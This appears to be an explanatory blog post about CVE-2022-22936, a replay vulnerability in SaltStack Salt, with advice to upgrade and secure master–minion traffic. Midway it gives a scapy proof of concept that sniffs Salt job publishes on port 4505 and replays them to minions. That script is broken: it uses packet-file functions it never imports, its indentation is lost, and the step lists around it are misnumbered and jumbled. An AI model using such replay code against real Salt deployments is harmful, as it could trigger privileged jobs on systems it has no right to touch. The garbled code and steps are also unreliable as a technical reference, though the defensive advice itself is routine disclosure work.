SaltStack Salt is a popular open-source configuration management tool widely used to manage infrastructure at scale. But in early 2022, a worrying security flaw—CVE-2022-22936—was discovered in SaltStack Salt, affecting job publishes and file server replies. This post breaks down what went wrong, what could happen if you’re vulnerable, and how you can protect your SaltStack setup, all in plain language.
What is CVE-2022-22936?
CVE-2022-22936 is a vulnerability in SaltStack Salt before versions 3002.8, 3003.4, and 3004.1. It allows attackers to perform what's called replay attacks against Salt's job publishing and file server reply mechanisms. In simple terms, someone could intercept legitimate jobs and replay them, causing Salt minions (the systems being managed) to run old jobs over and over—potentially with severe consequences.
Source
- SaltStack Advisory
- NVD CVE Record
How Does the Vulnerability Work?
Normally, SaltStack's master node tells minions what to do by sending jobs or files. But CVE-2022-22936 happens because these job publishes and file server replies weren’t properly protected against being captured and resent (replayed). If an attacker is able to capture network traffic (say, by being on the same network or via a compromised machine), they could:
Replay file server replies, potentially leading to unauthorized file access or actions.
With the right timing and planning, this could let an attacker execute commands as root on targeted minion systems.
Sniff Traffic: Capture legitimate job publish messages between master and minion.
2. Replay Old Job: Resend the captured message, causing the minion to repeat the job (which could be a privileged action).
3. Escalate Privileges: If the original job ran as root (or with other high-level privileges), the attacker now runs jobs as root too.
Example Attack Flow
Here’s how such an attack might look in Python, using packet capture and replay tools like scapy (for proof of concept, and for educational purposes only):
from scapy.all import sniff, sendp
# Step 1: Capture SaltStack job publish packets
def capture_jobs(packet):
if packet.haslayer("TCP") and b'salt' in bytes(packet):
# Save packet to file for later replay
wrpcap('salt_jobs.pcap', packet, append=True)
print("Capturing SaltStack job publishes on port 4505...")
sniff(filter="tcp port 4505", prn=capture_jobs, count=10)
# Step 2: Replay captured packets to minion(s)
print("Replaying captured Salt job publishes...")
packets = rdpcap('salt_jobs.pcap')
for pkt in packets:
sendp(pkt)
> Note: This is for demonstration only. Replay attacks require privileged access, such as being on the same LAN. Never use this code against systems you do not own.
Why Is This Such a Big Deal?
Because SaltStack automates critical system operations, allowing jobs (even as root)! If attackers replay sensitive jobs, like changing user passwords, installing software, or even disabling firewalls, it could disrupt or compromise entire infrastructures.
Check your Salt version
salt --version
Upgrade SaltStack ASAP!
- SaltStack 3002.8
- SaltStack 3003.4
- SaltStack 3004.1
2. Audit your network: Make sure only trusted traffic can communicate with your Salt master and minions.
3. Use TLS/Encryption: Make sure any SaltStack communications use strong, up-to-date encryption and keys.
Reference Links
- Official SaltStack Security Advisory
- Full CVE Record: NVD
- GitHub Release 3004.1
Conclusion
CVE-2022-22936 is a classic example of why network security and message verification matter for configuration management tools! If you use SaltStack, update now to keep attackers from replaying your jobs.
Stay safe—never leave critical automation tools exposed or unpatched.
*If this was helpful, consider sharing with your fellow sysadmins!*
Disclaimer: Proof of concept and exploit code shown here is for educational use only. Never attack any system you do not own or have permission to test.
Timeline
Published on: 03/29/2022 17:15:00 UTC
Last modified on: 04/06/2022 20:03:00 UTC